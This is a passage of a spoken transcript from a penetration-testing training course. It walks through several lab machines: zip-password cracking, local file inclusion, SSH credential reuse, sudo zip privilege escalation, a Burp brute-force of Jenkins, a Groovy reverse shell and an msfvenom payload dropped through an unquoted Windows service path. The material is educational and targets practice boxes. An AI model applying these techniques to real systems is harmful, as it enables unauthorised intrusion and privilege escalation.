mount dev ls, and you can see that there is a file in there. That file is called save.zip. So I'm gonna go ahead and try to unzip that. And it says, hey, we need a password to unzip this ID RSA file. I have no idea what the password is, so looks like there's an ID RSA in here and a to-do.txt, and we don't have the password for either of these. Now, there's a possibility that we go online, we look through some of these folders, maybe something comes back, there's a password in there, that's the path to go. The other thing that we can do is see if we can crack this very quickly. If we can crack it, then maybe we can get in there. And there's a tool out there called fcrackzip. So we can do something called like apt install fcrack zip, just like this. And I've already got it installed, but you should not. It doesn't come by default. Okay, go ahead, let that install. Should only take a second, and then come back. And now we're going to do fcrack zip, just like that. Yours might not auto tab. You might just have to type it out. That's okay. -V for verbose. We want to have verbosity here. See all the output. -U just means we're going to be unzipping. So we're going to unzip the files here. And a -D means we're going to be using a dictionary attack. And a -P means we're going to be using a file in order to attack. So the dictionary attack we're using is the user share wordless, and then we're going to use rocku. Okay. And on this other part, for the -P, we're going to go ahead and use this save.zip. So we're using a string here as the initial password file, which is what we're doing. If we didn't have this here, it would just start attacking via the files inside. So we're calling out specifically And then here we're saying we're using a word list. Here's the word list we're using. So I'm gonna go ahead and run that, hit enter. Okay, and you can see that we have found password is equal to Java 101. So now if we go to unzip, save.zip, type in Java 101, hit enter. Okay, we ls, they should be here now. So let's cat out the todo.txt. It says, figure out how to install the main website properly. The config file seems correct. Update development website. Keep coding in Java because it's awesome. And then we get a signature from JP. We don't know who JP is, but we do get an ID RSA file. So that ID RSA file can be used in order to connect via SSH. Now, we don't know who the user is. There's a chance that the user might be JP, so we can do something like SSH-I. I'm not sure if the permission settings here are going to be correct in this ID RSA file. We'll see here in a quick second. And then we come in here and we say something like JP at 192.168.138.137. Cross your fingers, type yes. It asks for his password. We don't know a password. So we're not even sure if that's working. We're not sure. It didn't even look like it took the ID RSA. So we're not sure if this guy's even a user. So let's keep this information in our back pocket for now. We have this, we're gonna clear screen. We have this ID RSA file and we have some information hopefully sitting here waiting for us. So on the port 80 side, we have a public 301, we have a source 301, we have an app 301, vendor extensions. Okay, so maybe we come in here and we take a look at that. Also on this side, we have a dev directory. So if we go in here and we just /dev, we are brought to this bolt wire application, which is cool. On here, we have a few different directories that came back. Let's see. We have public source app, so we can kind of go through those manually. Just public, see what's there. Nothing's there. Bolt user first. It says source site. We get a customization extension PHP. I don't know if there's anything in there. You could open that. Doesn't look like it's going to go anywhere. Next, we go to app. Kind of come through here, and this is where we find a directory. And I think I said in one of the past videos that it's kind of realistic. I have seen this actually on a pen test before, where you come across a directory, and this directory listing can be a finding. One time I literally came in here and the first thing sitting at the top of the directory was SQL database with all the passwords and information in here. So looks like there's a Bolt database in here, though the size is 0. I clicked through here earlier, trying to click around, see if I could find anything. Cache is interesting, but config would probably be more interesting, especially a config.yaml file. So I went ahead and just downloaded that, and then I have it stored here. I'm going to go ahead and just open that up, and I encourage you to do the same. Open with mousepad, open with whatever you like. Here you can see that it says, hey, the username's Bolt and the password is I love Java. So I'm going to copy this. We don't know where this works, if this pays off for anything anywhere, but we're going to save this information kind of in our back pocket. So I'm going to do a new tab in here and just paste that because that's some information that we got. So the other side of things is that we also have a Bolt wire application. And we can come in here and look around. It looks like there's a registration page. Might be able to register like hacker and password hacker. Come in here. And it doesn't look like it's letting us do anything else. So we're clicking around. We got some search features. It doesn't look like it's doing anything. Can print some information on the site. So it's best to click around, see if there's anything of interest in here, but I'm not seeing anything at this point in time of interest. So as of right now, I'm curious as to this Bolt wire, if there's anything, any vulnerabilities that exist. So we can go out to Google. Actually, I have Google open right here, and we can just say like Bolt wire exploit and see what comes up. Now there's one from 2020. There's one from 2012. I'm going to use the more recent one, this local file inclusion. We could also search this on our Kali machine, by the way. We can go in and just do like a, let's see, we can do a search exploit and just do bolt wire and see what comes back. And you can see that all that shows up are multiple cross-site scripting, which cross-site scripting is not going to have any effect for us. Like putting cross-site scripting here isn't going to do anything on a box like this unless they are from a CTF standpoint, unless there's somebody mimicking a user going in and actually navigating the website. There's no use for even attacking cross-site scripting. That's not to say that this is not a great vulnerability and this is something that you would see in the real world. You absolutely do. But we attack real users with this. That's part of it, because you store cross-site scripting or you store JavaScript and you attack users with that. We're not attacking any users. We're just attacking this box at this time. So what we're going to do then is probably really focus on this local file inclusion. So let's take a look at it and open this up. We'll talk about local file inclusion, what that is, what it might be. So really quickly, local file inclusion allows us to potentially expose files that are running on a server. And this can lead to information disclosure, as you're going to see here, remote code execution, cross-site scripting. There's a lot of things that it can do. So basically what's happening is it is accepting this path here as input. It's a coding error on the development side. So we're able to input this, and what we're doing, .. / imagine you're in a Linux machine. We're literally just saying, hey, I want to go back as far as possible to a base directory, and then etc password. Okay. So this could be as many directories as needed. You could throw in 10 of these and it might work. And then we're trying to get the etc password because this will allow us to see who's on the machine running. Now, if this is running as a root user, then guess what? We can run this as etc shadow and go grab the hash, and maybe we have even more sensitive information. But this attack by itself is pretty cool and is it's not seen in the wild as much, but it is definitely out there. So it's something we test for on every web application. So what we're going to do here is we're looking for local files. Remember, this is local file inclusion. So no remote files, which is a different type of attack. LFI here, not RFI. So it looks like we're using action, search, action, and then this attack frame here. So I'm going to go ahead and just copy this. I'll show you why. Because I was looking at the application and you can see that here's the index.php, p equals welcome. In here, it's very similar, p equals action.search. So this is on the search feature, it looks like it's happening, or on the action parameter. So we're going to go ahead and paste that in here. Make sure you've created an account, by the way. If you do not have an account created for this, then it is not going to work. I don't know if that says that in here, that you need to be authenticated or not. Oh, it does. Being authenticated. So if you're not authenticated, it will not work. So you can come in here, just come over here and paste, cross your fingers, and it works. So one thing I want to try real quick is like etc shadow. Nothing. It was worth a shot. You never know. So we're not running as a user that can read the etc shadow file. So in this instance, we're just looking at a user that can read the etc password. That's okay. We're not a high level user here. And what we can do is we scroll down to the bottom. We always know root's at the top. Scroll down to the bottom to see who your users might be. And out of anything that stands out in here, there's only one user, and that is our friend JP, who looks like his name is Jean-Paul. So I think we have a user here. So this explains why the JP didn't work for us before when we tried logging in on the machine, because John Paul was the user that we had, and he wasn't on that machine. So we were looking for John Paul. So now we found a little bit more information, and we can tie this all together, hopefully, and actually exploit this machine. So I'm going to go back. Where was the mount that I had? I'm going to go back in here and try SSHing again with this file and do a Jean Paul. And it's asking for a password key phrase. Okay, so there are two options that we can do here. Option number one is you are capable of brute forcing this key ID RSA. John the Ripper can take this and push it through. The issue is if the password doesn't show up in your word list, or the password is too strong, for example, then it's not going to work. We also have some information that we found before that might work out for us. We already know that John Paul, or JP, said in his to-do that he is a lover of what? Java. And he comes in here and we have a password saying, I love Java. Now, my hunch is this probably doesn't show up in RockU, and we can do a quick check on that actually. So let's just do a cat user share word list RockU like this, and you can just watch, and then we're just going to grep on this password. It doesn't show up. Like where if you wanted to grep on like pasta, you could see all the different times pasta shows up in this word list. So that if we were to run RockU against this with the word list, it wouldn't have worked. Now, if we would have had a really good word list, possibly it shows up. But we already know a little bit about him. We're going to go ahead and try pasting that in. And of course, it works. Jean-Paul really loves Java. So Jean-Paul at dev has logged in, and now we are the low-level user. So we'll do a quick ls. Print working directory. We're in his home folder. There's nothing here. Some things that I like to do immediately. History check. Okay, it looks like somebody cleared out the history. Somebody ran a sudo-l in here, exited. Sudo-l is the second check that I like to do, or even first check that I like to do, because it tells us what we can run as sudo without a password. Okay, so sudo, remember, is what we can run as elevated privileges. So in this instance, we can run the zip feature with no password. So we can literally run sudo zip and it should work. Okay, so it's not requiring a password. Awesome. Issue here. How can we take sudo zip and abuse that feature for us to be able to escalate into root? That is the question. If we have a no password, which this comes up a lot in boxes like this, like CTF style boxes, if we have a no password, how can we do this? So we need to go take a look at that. We come over here. I got a site for you. Go out to the Google machine. Okay. And you're going to type in GTFO bin, just like that. It's really GTFO bins, but we took what showed up first. Okay. GTFO bins. Great website. Let's make it bigger. Great website. You come in here, you can look for the different type of escalations that you want. We have a sudo escalation, okay, sudo escalation. And we come in here, we say, okay, we've got sudo, and then we're looking for zip. We can type in zip in the search bar, but we also have zip right here. So if we want to do a sudo zip, we go into zip, look for sudo, and it says, here's how you use sudo as a zip in order to get root privileges. Okay. And so it says in here, if the binary is allowed to run as a super user by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate, or maintain privileged access. It's telling us what it's doing. All we have to do here is copy this, come over, paste this, okay, come back, copy this. This should drop us into a shell. Let's see what happens. All right, we have been dropped into a shell here. As sudo, we dropped into a shell. So with that, if we type in ID, we are now root. Why? Because sudo runs elevated. We said, okay, as elevated user, we want to go ahead and drop into a shell here. We did this. Now we can go cd to root, ls, cat out our flag. Congrats on rooting this box. And that's it. So hopefully that was informative for you. This was a little bit on the, I would say, easier side of the machines. We're trying to go in order of difficulty. This one is something that you get a few different options for you. It shows you how to mount. It shows you how to enumerate multiple web directories and really tie a bunch of information together, which is nice. And then you get to see a classic sudo no password escalation, this time using zip. But if you see in the GTFO bins, when we went back and just highlighted sudo, there are a lot of escalations if sudo privileges are enabled in order to get into to go from low level to root. So it's quite fun and quite common, by the way. So that's it for this video. I will go ahead and see you in the next one. On to the next machine, which is Butler. Now, Butler was created by Joe Helly, aka the mayor. Thank you so much, Joe, for creating this machine for us. And this machine is going to be a Windows-based machine that is going to allow us to explore privilege escalation, since when we first used Blue went right to root for us. So this one's going to give us some experience with privilege escalation. Now, I have this accounts.txt file open just to show you that the administrator password for this one's a little bit different than the other Windows machine. This file is included in your download. So if you downloaded this, you've installed it, you should have found the accounts. That way you can go and get the IP address that was pulled from this machine. So with that out of the way, I went ahead and ran nmap again, similar process. Now here we have 7680 open and 8080 open. I'm going to go ahead and you can ignore that for now. I'm going to go ahead and go out to the website 168.138.138. And we're going to see if it would help if I put 8080 on the end of it. We're going to see what's there. Okay. All that's here is a login page for Jenkins. So we don't have much here yet. There are a few things that we can do here. We can try to do some brute forcing. We can look for directory busting. We could try to do a view page source real quick and see if there's any information in here that might indicate what version we're running on, and see if there's anything in here that we can get maybe an exploit off of. And really, there's not going to be much. We could go to Google and do a quick Jenkins exploit and see if we can find any sort of Jenkins exploits. And there's this here about attacking Jenkins. There's one here about attacking Jenkins. This one has remote code execution. And we can kind of click through these and see what we're looking at for this. So it looks like 2015 Jenkins has some deserialization attacks. 2018 had authentication bypassing. And it looks like, let's see, we've got check script, remote code execution. There's a lot of different, looks like, attacks in here. There's some password spraying that you can do against this, which we'll talk about here in a minute. Dumping secrets, Groovy scripts, reverse shells with Groovy. Okay, so there's quite a bit in here. This one is a little bit, let's see if it's the same or not. This is saying, hey, here's how you get code execution. There's 3 ways to get code execution, which ideally we want code execution. We could do some brute forcing here, but I'm going to show you a way to do brute forcing without having to do this. We can do some remote code execution, and it shows, hey, there's a few different ways to do it. In this instance, we're going to need authentication. There's no way around this. For using Jenkins, we need authentication to get in here. So it's pretty neat. They show you a few different ways to get this exploit, and everything's pointing back to Groovy, or it looks like there's a PowerShell way of doing it, which is neat. This article here tells you, hey, when you're logged in, you can log in, and it shows you how to attack this. This looks a little bit older. So there are ways around this, and we can do some research into this to see, okay, how do we exploit Jenkins? All signs so far are really pointing to authenticated attacks. There are some here that are older that looks like they're bypassing authentication. Just to save time and skip ahead, we're going to go ahead and avoid those, though it's not out of the realm of possibility that you explore those, go down these rabbit holes, check it out, see if there's any sort of attack that you can exploit here. So our main focus is, how do we log into this application? We haven't found any sort of version information, which is unfortunate. The other thing that we can do is we can go to Google and we could say Jenkins default password. And it says the default password is admin password, which is what's created the very, very first time you log in. I think it asks you to change it once you log in, though I am not 100% confident on that. And we can come in here and try admin password. And we're going to see that doesn't work. Unfortunately, we don't have default credentials here. So we have the possibility of doing some brute force directory busting on this. Maybe there's a configuration file or something sitting on the back end that we can get access to. I'm going to tell you, just to save time, that is not the case. Though if you're thinking through that methodology or that mindset, that's fine. I think that's okay. The other option is this port here, this 7680. We could try connecting to this. You can use Netcat, you can use Telnet. There's options here where you can try, for example, you could try telnetting, but you could do apt install telnet because it doesn't come by default anymore. And then you would just go telnet IP address 138.138, and then that port number, which would be 7680. And you could see what's listening on there. This is a odd port. It's trying it, it's not connecting. It's one of those weird ones that you don't really see that often. And I'm telling you from my experience, I don't see that often. You can go out and Google, hey, what does this port do? You could also go and say, hey, I know this port's open, so I'm gonna go ahead and just try 7680 here. That's gonna stall out. It's not a web address either. So we're running out of options on how to actually connect to that. That could be a false positive that it came back on as well. We're not sure because we're not getting any actual connection into that machine. So with that being said, we need to brute force Jenkins. Now you saw Metasploit had a module. Somebody showed that in one of these. We're going to do it the burp sweep method because that's my favorite go-to. And I'll show you the burp sweep method. If you want to play around with some of these other methods, like that's shown in here. Sorry, I'll make this bigger, but that's shown in here. Feel free to go use this in Metasploit and see if you can brute force passwords, usernames, etc. But from here, what we're going to do is we're going to use burp sweep. So I'm going to use a tool called Foxy Proxy. Since we're in 2021, I'm going to go ahead and show you how to install this just to get this up and running. If you just type in Foxy Proxy, literally go the first link you get with standard, go in here, hit install. Mine's already installed, so it's going to ask me to remove it. All you got to do is install it. It should show up right here in the corner. Little fox, okay? You go to options for your first time setting it up. And in here, all you want to do is hit add. And then I'm going to cancel this. Let's edit this so you can see what my settings are. I just named it burp 127001, our local host, and our port of 8080. What this does is we use burp suite once in the course, and we had to go in and change our settings and our preferences and come in here. This just does it for us automatically with like the flip of a switch. So when we open up burp suite, let's go ahead and do that. You can just type in burp up at the top and open up burp suite. So we're going to use this proxy, right? We're going to proxy through this. I'm going to cancel any requests for updates. We're just going to use what's in here. This is 2021 2.1, which is new enough for me. I've made my font size really big, so yours might look a little bit different. This is just for video recording purposes. But in here, we have a proxy. Okay, this is what we're going to be listening on. We're intercepting some traffic. We showed this a little bit in the last, the enumeration section. But here you can see 127.001.80.80 is where the traffic is flowing through. And I'm going to go ahead and intercept traffic. So like I'm going to come in here and I'm going to say admin password on this attempt, which I know is not going to work. But we have the traffic now intercepted, hopefully in our burp suite. Maybe if I actually turned on this would work. Let's try admin password. Hit enter. Okay, now it comes up. So you can see the request comes through in this inspector. We're getting a post request. We're trying to pass this password through admin password sign in form. Okay. What I'm going to do is we can send this to repeater. I'll send it to repeater first. Then I'm going to send this to intruder. So just right click. You can do Control R or Control I. Both work. Control R to send to repeater. Control I to send to intruder. But in this instance, we can just push this request, hit send. And this will just say, hey, 302 found. You can follow the redirection. It's going to say 401 unauthorized. All right, so that's one thing. We could see in here that the set cookie comes remember me equals, and there's nothing in here. So that could be something to look forward to a little bit later. But what we want to do is we want to come in and we could technically brute force. We could be like password 1, go send that one and keep coming through until we can follow the redirection and find an actual login. Doing this with repeater will take forever. Good thing is we have something called intruder. So if you come in here and you go into the positions tab right here, go ahead and hit clear. What we're going to do is set a couple of positions. We're going to come in here and we're going to say, okay, admin, I see you. I'm going to go ahead and say add. Double click on admin, hit add. Double click on password, hit add. We are basically setting up our parameters or our variables that we're going to use. So we're going to perform an attack where we give usernames and we give passwords, and it's going to try those in combination. So really, when we use multiple facets here, we're either going to be using Pitchfork or Cluster Bomb. So Pitchfork is great for what is credential stuffing, which we're going to be trying, hey, I know this user has this password. So we'll say admin has the password of password, and we may have found that in a breach. Okay, so we'll try admin to password, and then we'll try next user with that password. So it's 1-to-1. Now, Cluster Bomb is, I'm going to try every single user with every single password in the list. So if I've got 5 users and 10 different passwords, that's going to be 50 different attempts, because it's going to try user 1 with all 10 passwords, user 2 with all 10 passwords, and so forth. So we're going to use a cluster bomb attack because we have no idea what the username or the password is. Now, in order to save time, I'm going to just type in a few different payloads here. Realistically, we would guess some different usernames that would go in here. Like, for example, admin, administrator, Jenkins. Okay, if we knew like an IT person or somebody who might be running this, we might put in their name. But in this instance, we might just want to run with these 3. And then on a bad password list, we might just go copy like the worst 100 passwords or worst 500 passwords and then just hit paste and paste it in here. In this instance, I'm going to type out some bad passwords. So maybe password, Jenkins. How about password with a capital P, Jenkins with a capital J? Okay, something like password 1, etc. Now, we have 3 different users, 5 different passwords, 15 different attacks. 3 times 5 is 15. So we're going to try admin first with all these passwords. Then it's going to go through and try administrator with all these passwords. Then it's going to try Jenkins with all these passwords. Okay, so we're going to hit start attack. And what's going to happen is it's going to start pushing through. And we have to be very cognizant and watch this and watch for any sort of changes that might happen in this. Okay, it's very, very subtle. Okay, when we're looking through this, if there's a status change, sometimes these will go like 401. Or we could follow the redirection in the settings, by the way. We could select that. There's also advanced stuff that we'll get into with, like, we can use grep to look for different changes in here. We'll talk about that a little bit later, but we also cover that in the external pen test playbook course, because that is something that we do when we're doing password spraying attacks. Here in this instance, we are looking for subtle changes like the length that is here. If you notice, everything's 302, so there's no difference in status changes. There's no difference in like error codes or anything. What we're seeing though is 318, 318, 318, 318. All of a sudden there's a 314 on Jenkins. What changes here? What is the response that changes compared to this? Okay, here we get a J session ID cookie, where here before we did not have that. Here we get a cookie, and then what changes? Here we already have a J session ID cookie, and we're getting a login error because we have more data that we're storing in here. We're already authenticated. So now it's gone from 318 down to 314 for this one request into a bunch of 408s to 409 range. So this one small tiny little request here, this little length difference, could be the indicator that there's something different. So you have to really scroll through this, use your eagle eyes, and make sure that you are looking through this with a fine-tooth comb. Here, I am seeing Jenkins as a valid login, and we're going to go attempt that. I'm going to turn this off. We're going to go attempt to log in with Jenkins. And hopefully we get in. Okay, we do get in. So from here, we do have the ability to run code execution. Let's see what they say. So we need to find a place to execute this code. This is okay. I've seen better write-ups on this. So going around and doing some research, you will find places to execute code in here. If you go into Manage Jenkins, there should be a bunch of different tools that are in here. Scrolling through, there is a command line here that you can run from a shell, which seems pretty interesting. It's just getting into a shell on this machine from a script. There's also a script console here. Okay, the script console is interesting because it's in Groovy. We've seen Groovy a few times. You might even type something like Jenkins script console exploit, something like that. And you can see exploiting Jenkins Groovy script console in multiple ways. So this is somebody that came in here and did this. Another thing that you can just read through and see, they're using Metasploit. We can use manual methodology, which is right here. There's a GitHub reverse shell, which honestly, if you just go to Google and you just type in Groovy reverse shell, the first thing that comes up should be your ideal one, which it looks like that's the same one they had too. But this is what I like to use. You can come in here, make this a little bit bigger. You can just go raw, copy this, and then we'll paste it and we'll talk about it. So copy that, paste it in here. So we need to utilize this for a reverse shell. This is using command.exe to perform the reverse shell. It's giving the port of 8044. You can choose whatever port you want here, but I'm going to keep it the same. Why not keep it simple? Okay, so I'm going to make this bigger. Netcat MVLP 8044. We'll set up a listener. On here, we have localhost. We're not running localhost, okay? We're gonna give it 192.168.138.131 or whatever your attacker IP is. So whatever your IP of your Kali Linux machine is, this is what you wanna get. So this is just a reverse shell. All it is written in is Groovy instead of the other ways that you've seen it so far. So it's going to reach out to us on this port, and when it reaches out to us, it's going to execute command.exe. Here's the whole process of that code. All we have to do is execute this, which I might need to make this a little bit smaller to actually see that. Let's see, we'll just go all the way over to the right and I'll just run this. Okay, and it's stalling, which is usually a good sign, meaning that we are likely getting in, and we do have a shell here. So we are now, who am I? We are now Butler on Butler. We are not system. We're not authority system. So we need to take this a little bit further and see if we can elevate privileges. Now, there are several tools and methods that we can utilize. We are going to look at a classic form of privilege escalation on this machine. If I were going through this machine, the first thing that I would do is I'd look at system info. I would want to know what machine this is, what the build is. You can see we're running on Windows 10. If this was running on an older edition, this is a Windows 10 Enterprise, which is nice. We're running on Windows 10, so the chances of there being an exploit for this build may be pretty low. I would look at this build, see if there's anything there that we can use or abuse in order to get escalation. But the intended path on this, as of right now, is a different method. So we're going to look through that, and I'm going to show you kind of the basic enumeration process that we can use. Again, if you're curious and seeing this in way more detail, you are welcome to join us in the Windows Privilege Escalation course and go through this a little bit more. So with that out of the way, there is a tool out there called WinPeas. So I'm going to go back. I'm kind of already cheating and going ahead because I downloaded this earlier. But if you search WinPeas, remember LinPeas? This is the Windows version of LinPeas. So just go to the first thing that you see. Now in here, if you scroll down a little bit, they have the different, they'll have different downloads. So we can go into the exe here, WinPeas exe, and you'll see an SLN. We don't want the SLN. We just want to be able to download the latest. So go into download the latest version. We're not gonna compile this. We're just gonna trust what they've got. So come in here, download WinPeas x64.exe right here. All right, I'll say okay on this because I want to show you again what I do. If you come into root and you open a new tab, make sure you move this. So I moved, I don't know if I actually downloaded it. Let's see. WinPeas, I didn't download it, but I moved WinPeas, whatever it's called, WinPeas 64. Make sure you do that. Move that into your transfer folder, or ensure that you're going to have it where you want to host it. I actually just moved it and I renamed it winpeas.exe because it's a lot easier to just type that out on a machine. And so a little bit keeping it simple. So with that, I'm going to go ahead and just do this, which is Python 3-m for module, http.server, and port 80. So we're going to host up this transfer folder. In here, I'm going to go ahead and go to my shell, and I want to go to my user folder or somewhere that I can write. It looks like I'm in the Jenkins folder, but I like to go, first of all, cdc user. Okay. Actually, cdc users. Do a dir in here. Butler should have read access or read-write access, so we're going to go there first. What we might do, too, is see if there's anything in here. Like, we might look at like well, he's got some downloads in the downloads folder, it looks like. An indicator in here is looking at the different times. Sometimes when you're doing these CTF machines, like what was the last time this was updated? So there might be something in the downloads folder that could be of interest, like CD downloads. Go dir real quick. Looks like WiseCare 365 was installed. Who knows what that is? That could be something of value to us later, but that is not... That is information. It's just not exactly what we're looking for at this exact second. We can go around, maybe CD to the desktop, see if there's anything there. Nothing there either. Okay. So we just want to be able to put a file somewhere that's writable. So I'm going to put WinPeas here in Butler's folder, just his base folder here for his user. And all we're going to do is use a tool called certutil to transfer this over. So certutil.exe. We're going to do a -URL cache like this, -F for file, and then we're going to grab the 192.168.138.131/WinPeas. We're going to call it WinPeas. Okay, we should do a dir, and it should exist right here. If you need a second to catch up, go ahead and catch up. Otherwise, we're going to go ahead and move on. So now we just run winpeas.exe, and special note, yours might not be in color. You can run this reg add command, or should be able to run this. I'm not sure as a lower level user actually. So you might have to suffer through the first time with seeing it not in color, but just follow along on my screen if you can't run this reg add, but you're gonna have to run this and then run this again. Otherwise, we're just gonna kind of scroll through this and see. This is similar to what we saw with WinPeas. Red means something we want to look at and kind of scroll through. Okay, so we're just going to scroll through this. There's a lot of output on this machine. I'm looking for anything that quickly stands out for me. These protection enabled, they really don't matter to me at this moment. I'm looking for something that might just like, hey, this immediately stands out. So it's giving us drive information. Most of this is just disk enumeration at this point. Nothing of value so far. It's looking up printers, tells printers, is looking up named pipes, which is fine. Going through, this is telling us explicit credential events, which these are plain text credentials if we have them. I'm not seeing anything here. So we'll scroll through these, keep going. Printing account logon events, these are just events again. So WinPeas has gotten beefier over the years. It used to be pretty quick to scroll through. I'm going to actually cheat a little bit and scroll down. PowerShell script blocks. Let's keep going here. Okay, users information. It's telling us the users on this machine. And again, this is all different kinds of enumeration. Now, the SE impersonate privilege could be good for a potato attack, but that's a different type of attack. We're not looking for that at the moment. But that could be something, that's why it's highlighted in red, something we do cover in the escalation course. So it's telling us more about user accounts that are on this machine, any sort of RDP sessions that might exist, any sort of folders. Heavy enumeration to scroll through. Okay, we're in process information. I'm going to skip past processes. I'm not too concerned about what processes are running. That could take a long time to scroll through. When we're doing privilege escalation, we are looking for quick wins. So we got some service information, and in here there are some, okay, something does show up, and this is all lighting up red. So I'm looking and reading through here. We have the ability to modify services. Like we have the ability to modify Jenkins.exe. Perhaps we can modify that and write a shell code here and get a shell, since we're running as this user. But I'm not sure that that's going to run as administrator. It looks like file permissions here. We would have to be able to hijack that binary. So I'm going to scroll through. Again, this is disabled. We might be able to enable this. VMware, I don't ever attack. I don't know if that's really truly an attack method, even though it shows up a lot. The other one that showed up that's interesting is here. We have this Wise Boot Assistant, which was that WiseCare that we saw downloaded. So that's of interest because we did see that downloaded. We do see this running. And what's weird is, okay, it's running, it's auto running, and it says no quotes and space detected. It said you can modify this service, all access, file permission is run as administrator. That's very, very interesting. So let's talk about what we're seeing. And I know this could be a little bit overwhelming because this is just kind of throwing privilege escalation in your face from a Windows perspective, and that can get pretty messy pretty quick depending on what you're looking for. What we're looking at here and why this is important is we are looking at a privilege escalation that will allow us to get system on this machine. And this is called unquoted service paths. I'm going to show you what this looks like on the Windows machine. But basically what's happening is the service executable that is here, the service executable, it is located in a path that is not enclosed in quotes. Okay, so you see no quotes. And there's a space detected. So you see a space, you see a space. Okay. The issue here is that when we're running this, when Windows runs this and it looks for this service, when you start the service up, it's literally looking for every instance that exists before the space and it's trying to add .exe. So it first tries cprogram.exe, then cprogramfiles.exe. Okay, it keeps going on. Here, cwise.exe or wise/wise.exe, wisecare.exe. Okay, and what's happening is, I think my machine might have just shut down on me. I'm going to go ahead and turn this back on. As I was going to show you, what's happening is we can take an executable, malicious executable, basically malware, and we can upload it to this machine, place it in one of these folders. We don't have to overwrite this, by the way, not the boottime.exe. We can literally just write something called wise.exe. As long as we have permission to write into this folder, we can do that, and then we can run it, and hopefully we can get a shell out of that because the system is going down and it's looking for wise.exe, and when it finds it, it will run that first, and then we're going to attack it based on this. So I want to show you really quick on the Windows side of the things. Of course, I am locked out of the administrator account as well. Okay, so what I've done in here is I've gone out and I've looked for this service in the reg edit. You don't have to follow along, but this is an HKey local machine, system, current control set, services, and then the Wise Boot Assistant. When we say unquoted service path, if we look at this image path here, there should be, to prevent this attack from happening, quotes around this. There are not quotes around this. So this is called an unquoted service path, meaning we're not taking the literal path of this. Thus, when we run C program files x86 wise all the way through for this boot time, it's going to do those checks. Now, I don't know if we have write permissions to the C program files folder as a user, but we certainly should have write permissions here since we installed this, it looks like, as the user. So if we have write permissions to this wise folder, we can go ahead and just drop a file in there called wise.exe, and it will try to run wise.exe in that folder. Okay, so it'll go C program files, wise.exe. It's going to exploit this situation here, and hopefully we will get a shell out of this. So let's go ahead and give this a try. What I'm going to do is I'm going to scroll all the way down here and look at all this mess. There's a lot. Now, there are other tools that could easily identify this, by the way. Like this tool is probably the most comprehensive, and that's why I showed it to you. But there are tools called PowerUp, which will do this. There are exploit checkers that will do this. There are other ways to run through machines like this and do escalation checks. I'm showing you the most probably popular tool, but it is the most comprehensive and it can be overwhelming. So please don't feel overwhelmed. You will, with practice and over time, learn how to decipher this, read through it really fast, and know kind of what you're looking for, train your eyes for those things. Again, this is just introductory, ground level type stuff. So what we want to do is we want to generate some malware. I'm going to go ahead and stop sharing this folder real quick because I'm going to put malware into this. So we're going to use MSF Venom, and we're going to use this to generate some shellcode here. Okay, so we're going to do a payload of Windows x64. We're going to do a shell reverse TCP. And if you wanted to do this with Metasploit, you could do like Meterpreter, go down that path, etc. For this instance, we're going to use no Metasploit. We're just going to do this all manually. We're going to give our listening host, which is us, 192.168.138.131. This is your attacker machine. We're going to give a listening port. I'm going to call this 7777. Do a file type of executable and an output of wise.exe. You could also do this as wise.exe, just like that. All right. So we're going to go drop this once it generates into the wise folder. So I'm going to go ahead and put this back up as a transfer. So my transfer folder is back up and running. I'm also going to open a new tab, and I'm going to netcat nvlp, and we're going to listen on all 7s because that's where we said that this is going to work. So we know this is 64-bit architecture. We saw that, by the way, when we were running system info. We saw that this is Windows 10, 64-bit architecture. So this is all from our little bit of enumeration that we did. Going back to this machine, we need to go ahead and get into that folder. So that folder was in C. So we're going to cd C, and we're going to go ahead and do a quick dir. And it's easier for me to just copy like this and then do a cd paste like that, get you in there, cd into wise. Okay, and now we're in the folder that we want to be in. So if we type in dir, we got wisecare 365. So we're going to put wise in here. It's going to try to run wise.exe, and we should be good to go. So we'll see how this works. What we need to do is run cert util one more time. Same way, we're going to use this to transfer a file over, which is nice. HTTP, just like this, 192.168.138.131/wise.exe. And we're going to call this wise.exe, just like that. Hopefully it comes over. Do a dir. Okay, it's sitting in here. That's great. Now the question is, how do we run this? If we just do a // or if we just go wise.exe, don't hit enter. If we do wise.exe, that is going to run this as the regular user. It's going to run it as Butler. You will pop a shell back here as Butler, and we will have gain no ground whatsoever. So what we need to do is we need to stop the service that's running. Now the service that's running is the Wise Boot Assistant. Okay, we can query that to find that out. I'm just telling you how to do it, just a little bit easier. You can go Google what the running service is called. You could look through WinPs and it'll tell you as well. I'm just guiding you along, giving you a quick step ahead here. So we're going to do a service stop on Wise Boot Assistant. It's all one word like this. Okay. Okay, so it's saying stop pending. It's going to go ahead and stop that. We can do, I believe, SC query of Wise Boot Assistant. Okay, and you can see that this is stopped. So now that it's stopped, what we're going to do is we're going to start it. When we start it, it's going to execute as the system. It's going to run that shell code as system, and hopefully we get a shell back as system. So you see the shell came through. We say, who am I? Authority system. And that is it. So this is a very, very classic, absolutely classic way of exploiting a machine. So looking through the printout of WinPiece, again, there are other tools out there that do this. There's actually even a check that will do this from a one-liner. There are privilege escalation checklists and guides that you can go through. So when you get on a machine, you say, hey, I'm going to check this first, then I'm going to check this next. And you go through the checklist and make sure you leave no stone unturned. You kind of get your low-hanging fruit like you saw with the Linux. Like we'll check history first because maybe there's a password stored in history. Then we'll check sudo and see if we have any privileges and kind of go down the easy list. Same thing with system info. I want to see what the build is. If I can recognize the build, there's something there from trained eyes. And then kind of just go down the list as to what we need to do. Running WinPiece is something that we can execute fairly easy, run through it. Same thing with PowerUp or other tools like that. And we can go through and find issues like this. And this one is a classic. If you do any CTF machines, I guarantee you will see this in the future. So this is a good one to show you as an example and build you up into privilege escalation and get your feet wet in the game. So that's it for this machine. We're going to go ahead and move on to the next one. Welcome to this box titled Black Pearl. This box was created by Alec and is a Linux machine. Thank you, Alec, for creating this machine. We're going to go ahead and start off with our Nmap scan. As always, if you haven't found your IP address, go do that. Get your Nmap scan going. If you just want to follow and watch along and continue from here, that's fine too. Now, our Nmap scan only shows us here with port 22, DNS 53, and port 80. As discussed in the past, 22 likely not the option, so that really leaves us with 80 because 53 is likely not the option either, though it does come into play a little bit. Now we can see we have a default web page here just by looking at the title, this Nginx. We have a welcome to Nginx, meaning if we go out to this website, we go 192.168.138.130, and I turn off my proxy and refresh, and refresh, we get a welcome to Nginx page. So what do we need to do? We probably need to fuzz this and see where we can get with this information. So we're going to do a quick fuzz on this. Something else that's, I think, hidden in here. Let me view the page source. It always helps to define the page source. In here, you can see that there has been a little nice thing added in where it says alec@blackpearl.tcm. So that's your webmaster. Let me make it a little bit bigger. alec@blackpearl.tcm. This is a big hint giveaway, something we haven't covered quite 